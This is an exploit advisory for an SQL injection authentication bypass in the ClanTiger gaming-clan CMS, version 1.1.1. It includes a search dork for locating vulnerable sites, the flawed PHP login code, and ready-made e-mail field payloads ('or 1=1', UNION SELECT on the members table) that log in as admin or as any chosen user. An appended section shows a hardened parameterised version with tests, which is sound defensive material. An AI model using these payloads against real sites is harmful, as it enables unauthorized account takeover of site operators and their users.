CMS INFORMATION:
–>WEB: http://www.clantiger.com
–>DOWNLOAD: http://www.clantiger.com/download-clan-cms
–>DEMO: http://www.demo.clantiger.com/
–>CATEGORY: CMS / Portals
–>DESCRIPTION: ClanTiger is a content management system specifically designed for gaming clans…
CMS VULNERABILITY:
–>TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default)
–>DORK: "Powered by ClanTiger"
–>CATEGORY: SQL INJECTION/ AUTH BYPASS
–>AFFECT VERSION: LAST = 1.1.1 (1.1 too)
–>Discovered Bug date: 2009-04-11
–>Reported Bug date: 2009-04-11
–>Fixed bug date: Not fixed
–>Info patch (???): Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: To my girlfriend Marijose…brother, sister-in-law, parents (and friends xD) for their support.
Path –> [HOME_PATH]/module/login.php
Its contents:
function authenticate()
{
    // Raw POST values go to the access-control layer without validation or escaping.
    $authentication = $this->access->authenticate($_POST['email'], $_POST['password'], (bool) $_POST['stayLogged']);
    if($authentication === true)
    {
        header('Location: index.php?info=hasLoggedIn');
        exit;
    }
    // we couldn't log in
    $this->errorMessages[] = $authentication;
    $this->main();
}
Path –> [HOME_PATH]/function/class.accesscontrol.php
Its contents:
public function authenticate($email,$password,$stayAuthed=false)
{
    if($stayAuthed) $logintime = time() + (3600*24*356*3);
    else $logintime = time() + 3600;
    // attempt to get the user from the database
    include ROOTPATH . 'base/class.user.php';
    $user = new User;
    // $email is user-controlled and is used unescaped in the lookup below
    $user->email = $email;
    $user->password = md5($password);
    $user->getBy(array('email','password'));
    ...
}
**magic_quotes_gpc=off
[HOME_PATH]/index.php?module=login
login form:
e-mail value: something' [SQL]
password value: something //it is not used
login post form:
e-mail value: something' or 1=1 /* –> we are admin!
e-mail value: something' or 1 # –> we are admin!
Note: Now, we need DB_PREFIX (default: "", others: db_, clan_, etc)
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 /* –>admin (if id=1)!
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /* –>we are user id=12!
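A hardened form of the lookup, as an added example (not ClanTiger code and not from the advisory's author): the e-mail is passed as a bound parameter and the password is verified in PHP. The in-memory SQLite database, the members table layout, the sample account and the function name authenticateSafely are assumptions made for the demonstration.

```php
<?php
// Added example, not ClanTiger code. Table and column names are assumed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT UNIQUE, password TEXT)');

// Constructed sample account, stored with password_hash() instead of md5().
$db->prepare('INSERT INTO members (email, password) VALUES (?, ?)')
   ->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Returns the member id on success, null on any failure.
function authenticateSafely(PDO $db, $email, $password): ?int
{
    // Reject non-string input such as email[]=x before it reaches the query.
    if (!is_string($email) || !is_string($password)) {
        return null;
    }
    // The e-mail travels as a bound parameter, so quotes and comment
    // markers in it are compared as data and never parsed as SQL.
    $stmt = $db->prepare('SELECT id, password FROM members WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is checked in PHP against the stored hash, not in SQL.
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    return (int) $row['id'];
}

// Constructed checks: the e-mail values from this advisory are plain data now.
$cases = [
    ['admin@example.test', 'correct horse'],
    ['admin@example.test', 'wrong'],
    ["something' or 1=1 /*", 'something'],
    ["something' or 1 #", 'something'],
    [['x'], 'something'],
];
foreach ($cases as [$email, $password]) {
    $id = authenticateSafely($db, $email, $password);
    printf("%-24s => %s\n", is_string($email) ? $email : '(array)', $id === null ? 'rejected' : "member $id");
}
```

Because the query no longer depends on input escaping, the result is the same whether magic_quotes_gpc is on or off.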
GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community!